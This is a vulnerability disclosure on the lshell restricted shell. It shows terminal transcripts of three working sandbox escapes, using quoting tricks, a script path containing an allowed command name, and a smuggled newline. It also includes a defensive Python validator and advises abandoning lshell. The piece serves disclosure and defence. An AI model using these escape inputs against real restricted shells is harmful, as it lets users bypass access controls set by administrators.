0day vulnerabilities in lshell

    lshell is a shell that restricts the file system commands and paths accessible to the user. It is presented as an alternative to a complicated chroot setup:

    and so on, there are many sources offering it for use.

    The application is available in the repositories of Ubuntu, Debian and EPEL.

    Code Issues

    A quick look at lshell's notes on its configuration file shows that some of the restrictions lshell imposes exist to simplify command parsing, not to improve security. One example is the prohibition on semicolons and sub-shells. It makes sense to take a closer look at how this parsing is implemented.

    Examining the source code makes it clear that the command to launch and its arguments are picked out by a library intended for parsing simple CLI commands, which does not correctly parse the complex syntax of shell commands. At the same time, despite the warning in the documentation, after a simple validation the command is passed to the /bin/sh shell. The validation deserves special attention; it is based on the assumption that:

    There is no real syntax analysis anywhere, so these are far from the only assumptions the validation makes.

    The consequences

    The following scenarios are available for escaping from such a limited shell.
    Scenario 1: exploiting a problem with quotation marks and command chains
    vladislav@dt1:~$ getent passwd testuser
    testuser:x:1002:1003:,,,:/home/testuser:/usr/bin/lshell
    vladislav@dt1:~$ su - testuser
    Password:
    You are in a limited shell.
    Type '?' or 'help' to get the list of allowed commands
    testuser:~$ ?
    cd clear echo exit help history ll lpath ls lsudo
    testuser:~$ ls
    examples.desktop
    testuser:~$ which bash
    *** forbidden command: which
    testuser:~$ ls'usb'
    Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
    Bus 001 Device 006: ID 046d:c05a Logitech, Inc. M90/M100 Optical Mouse
    Bus 001 Device 002: ID 046d:c31c Logitech, Inc. Keyboard K120
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
    testuser:~$ echo && 'bash'
    testuser@dt1:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
    testuser@dt1:~$ reboot --help
    reboot [OPTIONS...] [ARG]
    Reboot the system.
         --help      Show this help
         --halt      Halt the machine
      -p --poweroff  Switch off the machine
         --reboot    Reboot the machine
      -f --force     Force immediate halt/power-off/reboot
      -w --wtmp-only Don't halt/power-off/reboot, just write wtmp record
      -d --no-wtmp   Don't write wtmp record
         --no-wall   Don't send wall message before halt/power-off/reboot
    

    Gh issue

    Scenario 2: running a script from your home directory, the path to which contains the name of the allowed command
    vladislav@dt1:~$ su - testuser
    Password:
    You are in a limited shell.
    Type '?' or 'help' to get the list of allowed commands
    testuser:~$ ?
    cd clear echo exit help history ll lpath ls lsudo
    testuser:~$ echo'/1.sh'
    testuser@dt1:~$ cat echo/1.sh
    #!/bin/bash
    /bin/bash
    testuser@dt1:~$
    

    Gh issue

    Scenario 3: using custom terminal sequences
    It is enough to start the command with any allowed word, insert a line feed by pressing two keyboard shortcuts in succession, and enter any desired command on the new line.

    vladislav@dt1:~$ getent passwd testuser
    testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
    vladislav@dt1:~$ su - testuser
    Password:
    You are in a limited shell.
    Type '?' or 'help' to get the list of allowed commands
    testuser:~$ ?
    cd clear echo exit help history ll lpath ls lsudo
    testuser:~$ bash
    *** forbidden command: bash
    testuser:~$ echo
    bash
    testuser@dt1:~$ which bash
    /bin/bash
    

    Gh issue
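
    What a validator has to do with the three inputs above, as an added example that is not lshell's code and not from the original article: the allow/deny decision is made on the same tokens that are executed, and the line is never handed to /bin/sh. The ALLOWED table, the OPERATORS set and the function names are assumptions made for this illustration.

```python
import shlex

# Hypothetical policy for this example: allowed name -> absolute binary path.
ALLOWED = {"ls": "/bin/ls", "echo": "/bin/echo"}
# Operators only a shell understands; refused instead of passed as arguments.
# Conservative: a quoted "&&" argument is refused too.
OPERATORS = {"&&", "||", "|", ";", "&", ">", ">>", "<"}


class Rejected(Exception):
    """The input line must not be executed."""


def build_argv(line):
    """Return the exact argv to execute, or raise Rejected.

    The allow/deny decision is made on the same tokens that get executed, and
    the result is meant for subprocess.run(argv) or os.execv, never a shell,
    so no second parser can read the line differently from the validator.
    """
    # A newline or other control character can smuggle in a second command.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in line):
        raise Rejected("control character in input")
    try:
        tokens = shlex.split(line)  # POSIX quoting: ls'usb' becomes lsusb
    except ValueError as exc:  # unbalanced quote
        raise Rejected(f"unparsable input: {exc}")
    if not tokens:
        raise Rejected("empty command")
    if any(tok in OPERATORS for tok in tokens[1:]):
        raise Rejected("shell operators are not supported")
    # Exact match on the de-quoted name: lsusb and echo/1.sh do not match.
    binary = ALLOWED.get(tokens[0])
    if binary is None:
        raise Rejected(f"forbidden command: {tokens[0]}")
    return [binary] + tokens[1:]


def check(line):
    """Demo helper: the argv on success, the rejection reason otherwise."""
    try:
        return build_argv(line)
    except Rejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Inputs from the scenarios on this page, plus one constructed benign line.
    for s in ["ls'usb'", "echo && 'bash'", "echo'/1.sh'", "echo\nbash", "ls -l 'a b'"]:
        print(repr(s), "->", check(s))
```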

    The best solution

    This software is too far from a state in which it can be used safely. The best course is therefore to stop using it.
